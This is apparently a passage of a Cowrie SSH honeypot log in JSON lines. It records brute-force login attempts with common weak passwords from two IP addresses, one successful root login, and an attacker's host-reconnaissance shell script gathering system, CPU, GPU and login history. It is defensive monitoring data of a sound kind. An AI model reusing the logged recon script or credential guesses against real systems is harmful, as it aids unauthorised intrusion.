0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:55:02.838636Z","src_ip":"212.227.125.160","session":"2bd056949a7a"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:03.404819Z","src_ip":"212.227.125.160","session":"2bd056949a7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35280,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c0792b39aac","protocol":"ssh","message":"New connection: 212.227.235.229:35280 (1.2.3.4:22) [session: 2c0792b39aac]","sensor":"my-vps","timestamp":"2025-08-31T04:55:04.307919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:55:04.311675Z","src_ip":"212.227.235.229","session":"2c0792b39aac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:55:04.566484Z","src_ip":"212.227.235.229","session":"2c0792b39aac"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:04.594777Z","src_ip":"212.227.125.160","session":"2bd056949a7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42936,"dst_ip":"1.2.3.4","dst_port":22,"session":"16bcb291abf7","protocol":"ssh","message":"New connection: 212.227.125.160:42936 (1.2.3.4:22) [session: 16bcb291abf7]","sensor":"my-vps","timestamp":"2025-08-31T04:55:04.709250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:05.077977Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:55:05.078576Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1qazXSW@","message":"login attempt [ftpuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:05.573961Z","src_ip":"212.227.235.229","session":"2c0792b39aac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35222,"dst_ip":"1.2.3.4","dst_port":22,"session":"1316b958b7a1","protocol":"ssh","message":"New connection: 212.227.235.229:35222 (1.2.3.4:22) [session: 1316b958b7a1]","sensor":"my-vps","timestamp":"2025-08-31T04:55:06.682786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:06.723463Z","src_ip":"212.227.235.229","session":"1316b958b7a1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:06.833983Z","src_ip":"212.227.235.229","session":"2c0792b39aac"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:06.922951Z","src_ip":"212.227.235.229","session":"582b25949067"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:55:06.924121Z","src_ip":"212.227.235.229","session":"582b25949067"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:06.925983Z","src_ip":"212.227.235.229","session":"1316b958b7a1"}
{"eventid":"cowrie.session.closed","duration":"79.4","message":"Connection lost after 79.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:07.631068Z","src_ip":"212.227.235.229","session":"2c7eb71511f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58646,"dst_ip":"1.2.3.4","dst_port":22,"session":"646ea2fa43e1","protocol":"ssh","message":"New connection: 212.227.125.160:58646 (1.2.3.4:22) [session: 646ea2fa43e1]","sensor":"my-vps","timestamp":"2025-08-31T04:55:07.945014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:07.945969Z","src_ip":"212.227.125.160","session":"646ea2fa43e1"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:55:08.055432Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:55:08.128332Z","src_ip":"212.227.125.160","session":"646ea2fa43e1"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:08.675976Z","src_ip":"212.227.125.160","session":"646ea2fa43e1"}
{"eventid":"cowrie.login.failed","username":"teste","password":"teste","message":"login attempt [teste/teste] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.059560Z","src_ip":"212.227.235.229","session":"1316b958b7a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:55:09.227649Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.228363Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.229080Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.229961Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.231231Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.232018Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.232874Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.233593Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.234020Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.234385Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.234746Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.235321Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.235878Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.784881Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.785752Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.786680Z","src_ip":"212.227.125.160","session":"16bcb291abf7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:09.860305Z","src_ip":"212.227.125.160","session":"646ea2fa43e1"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:10.301919Z","src_ip":"212.227.235.229","session":"1316b958b7a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45808,"dst_ip":"1.2.3.4","dst_port":22,"session":"b624fae64c96","protocol":"ssh","message":"New connection: 212.227.235.229:45808 (1.2.3.4:22) [session: b624fae64c96]","sensor":"my-vps","timestamp":"2025-08-31T04:55:14.005533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:55:14.031283Z","src_ip":"212.227.235.229","session":"b624fae64c96"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:55:16.009139Z","src_ip":"212.227.235.229","session":"b624fae64c96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45850,"dst_ip":"1.2.3.4","dst_port":22,"session":"726fd023c445","protocol":"ssh","message":"New connection: 212.227.235.229:45850 (1.2.3.4:22) [session: 726fd023c445]","sensor":"my-vps","timestamp":"2025-08-31T04:55:17.166697Z"}
